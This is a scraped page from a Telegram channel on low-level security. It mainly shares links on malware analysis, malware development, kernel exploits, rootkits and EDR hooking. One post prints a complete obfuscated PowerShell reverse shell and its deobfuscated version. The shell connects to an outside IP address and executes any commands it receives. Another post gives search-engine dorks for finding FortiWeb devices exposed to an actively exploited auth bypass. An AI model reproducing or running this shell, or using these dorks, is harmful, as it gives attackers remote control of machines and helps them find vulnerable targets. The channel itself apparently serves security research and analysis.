NEW BOT Телеграм, страница

Windows Instrumentation Callbacks

#kernel_callbacks #windows_internals #windows_kernel
@ZwLowLevel
https://cirosec.de/en/news/windows-instrumentation-callbacks/

cirosec

Windows Instrumentation Callbacks - cirosec

November 5, 2025 - This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs). Author: Lino Facco

429 views07:10

Low Level CO 🇨🇴

🧐

Time Travel Triage: An Introduction to Time Travel Debugging using a .NET Process Hollowing Case Study

#windbg #malware_analysis #process_hollowing

@ZwLowLevel
https://cloud.google.com/blog/topics/threat-intelligence/time-travel-debugging-using-net-process-hollowing

Please open Telegram to view this post

VIEW IN TELEGRAM

Google Cloud Blog

Time Travel Triage: An Introduction to Time Travel Debugging using a .NET Process Hollowing Case Study | Google Cloud Blog

The basics of WinDbg and Time Travel Debugging necessary to start incorporating it into your analysis.

43 views07:41

Low Level CO 🇨🇴

🚬

My Maldev Dumpster

#malware_development #maldev

@ZwLowLevel
https://github.com/inachtive/Malware-Development-Dumpster

Please open Telegram to view this post

VIEW IN TELEGRAM

GitHub

GitHub - inachtive/Malware-Development-Dumpster: My Maldev Dumpster

My Maldev Dumpster. Contribute to inachtive/Malware-Development-Dumpster development by creating an account on GitHub.

39 views10:53

Low Level CO 🇨🇴

GuLoader: Evolving Tactics in Latest Campaign Targeting European Industry

#guloader #malware_analysis #malware_campaing
@ZwLowLevel

Darktrace

Guloader: Evolving Tactics in Latest Campaign Targeting European Industry

Cado Security Labs (now part of Darktrace) identified a GuLoader campaign targeting European industrial companies via spearphishing emails.

38 views13:39

Low Level CO 🇨🇴

Forwarded from 1N73LL1G3NC3

This media is not supported in your browser

VIEW IN TELEGRAM

Fortinet 0day

An auth bypass + path traversal in Fortinet FortiWeb to create new administrative users on exposed devices without requiring authentication.

Blog: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/

Tweet: https://x.com/defusedcyber/status/1975242250373517373?s=46

Dork:
ZoomEye Dork: app="FortiWeb"
HUNTER: product.name="FortiWeb"
Shodan: http.noscript:FortiWeb

Affected versions: below 8.0.2

🔥1

29 views14:51

Low Level CO 🇨🇴

Hozho - Für Heisenberg [Say my Name]

40 views17:39

Low Level CO 🇨🇴

⌨

Technical Writeup: version.dll Sideloading, Proxying, and Hooking

#malware_development #maldev #hooking

@ZwLowLevel
https://github.com/kas-sec/version.dll-sideloading.git

Please open Telegram to view this post

VIEW IN TELEGRAM

GitHub

GitHub - kas-sec/version.dll-sideloading: sideloading PoC using onedrive.exe & version.dll

sideloading PoC using onedrive.exe & version.dll. Contribute to kas-sec/version.dll-sideloading development by creating an account on GitHub.

45 views17:47

Low Level CO 🇨🇴

Forwarded from Golden Byte

🎮

POC for PS5 kernel vulnerability in fsc2h_ctrl syscall

#kernel_exploit #ps5 #binary_exploitation

@ZwLowLevel
https://github.com/MeisterLone/no_ctrl

Please open Telegram to view this post

VIEW IN TELEGRAM

53 views17:57

Low Level CO 🇨🇴

🤣

LinkPro: eBPF rootkit analysis

#rootkit #linux_kernel #evasive_malware

@ZwLowLevel
https://www.synacktiv.com/en/publications/linkpro-ebpf-rootkit-analysis

Please open Telegram to view this post

VIEW IN TELEGRAM

Synacktiv

LinkPro: eBPF rootkit analysis

42 views19:45

Low Level CO 🇨🇴

📱

MacOS Infection Vector: Using AppleScripts to bypass Gatekeeper

#apple_exploit #macos #malware

@ZwLowLevel
https://pberba.github.io/security/2025/11/11/macos-infection-vector-applenoscript-bypass-gatekeeper/

Please open Telegram to view this post

VIEW IN TELEGRAM

pepe berba

MacOS Infection Vector: Using AppleScripts to bypass Gatekeeper

A look at how threat actors are abusing AppleScript .scpt files to deliver macOS malware, from fake documents to browser update lures, and how these noscripts ...

39 views21:27

Low Level CO 🇨🇴

💻

Home IoT Device Teardown and Analysis: A Complete Guide to Hardware Hacking

#hardware_hacking #iot
@ZwLowLevel
https://hackmag.com/security/gadgets-howto-3

Please open Telegram to view this post

VIEW IN TELEGRAM

HackMag

Home IoT Device Teardown and Analysis: A Complete Guide to Hardware Hacking

Tech magazine for cybersecurity specialists

44 views07:43

Low Level CO 🇨🇴

Kraken cross-platform ransomware

#ransomware #malware_analysis
@ZwLowLevel

Cisco Talos Blog

Unleashing the Kraken ransomware group

In August 2025, Cisco Talos observed big-game hunting and double extortion attacks carried out by Kraken, a Russian-speaking group that has emerged from the remnants of the HelloKitty ransomware cartel.

53 views07:47

Low Level CO 🇨🇴

No Leak, No Problem - Bypassing ASLR with a ROP Chain to Gain RCE

#binary_exploitation #exploitation #aslr_bypass #rop_chain #rce

@ZwLowLevel
https://modzero.com/en/blog/no-leak-no-problem/

Modzero

No Leak, No Problem - Bypassing ASLR with a ROP Chain to Gain RCE

51 views09:44

Low Level CO 🇨🇴

Skeler - Goldeneye 007 / Phonk

Stereovilla

45 views16:06

Low Level CO 🇨🇴

How a Catch-22 Breaks AMD SEV-SNP
(ACM CCS 2025)

#amd #sev_snp #os_internals

@ZwLowLevel
https://rmpocalypse.github.io/rmpocalypse-CCS2025.pdf

RMPocalypse Attack

How A Catch-22 Breaks AMD SEV-SNP

48 viewsedited 16:09

Low Level CO 🇨🇴

👻 Script de Powershell ofuscado:

${1}='62'+'.113'+'.66'+'.7';${2}=4*100+43;${3}='Ne'+'t.'+'Soc'+'ket'+'s.'+'Tcp'+'Cli'+'ent';${4}=new-object ${3}(${1},${2});${5}=${4}.GetStream();[byte[]]${6}=0..(8*1024-1)|%{0};while((${7}=${5}.Read(${6},0,${6}.Length)) -ne 0){${8}=[System.Text.Encoding]::ASCII.GetString(${6},0,${7});${9}=([System.Management.Automation.PowerShell]::Create()).AddScript(${8}).Invoke()|Out-String 2>&1|out-string;${10}=[System.Text.Encoding]::ASCII.GetBytes(${9});${5}.Write(${10},0,${10}.Length);${5}.Flush()};${4}.Close()

Ahora desofuscado:

$ip = "62.113.66.7"
$port = 443

$client = New-Object Net.Sockets.TcpClient($ip, $port)
$stream = $client.GetStream()

[byte[]]$buffer = 0..8191 | ForEach-Object { 0 }

while (($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
    $command = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $bytesRead)
    $result = ([System.Management.Automation.PowerShell]::Create()).AddScript($command).Invoke() | Out-String
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($result)
    $stream.Write($bytes, 0, $bytes.Length)
    $stream.Flush()
}

$client.Close()

@ZwLowLevel

Please open Telegram to view this post

VIEW IN TELEGRAM

44 views17:03

Low Level CO 🇨🇴

Se pueden observar las anomalías del stack frame cuando se hace uso de la librería de Detours para implementar user land hooks. En este contexto, se implementan hooks en MessageBoxW, poco realista en el mundo real para los proveedores de seguridad, pero en un contexto real, los EDR despliegan sensores para monitorear las llamadas a las funciones nativas (Nt*) en una variedad de contextos, como por ejemplo:

Funciones para la injeccion de procesos:

NtOpenProcess
NtAllocateVirtualMemory
NtWriteVirtualMemory
NtCreateThreadEx

El mapeo de objetos de sesión en memoria:

NtCreateSection
NtMapViewOfSection
NtUnmapViewOfSection

@ZwLowLevel

En resumen, aunque los proveedores de seguridad utilizan una variedad de sensores para recolectar telemetría en un entorne, el hooking hoy en día sigue siendo un método poderoso para identificar un call stack anómalo.

48 views18:16

Low Level CO 🇨🇴

🃏

Windows CodeDefender

This project demonstrates CodeDefenders ability to obfuscate kernel and bootloader files. The modified system includes obfuscated critical system functions and bypassed security mechanisms.

#low_level #windows_kernel #windows_internals #uefi #bootloader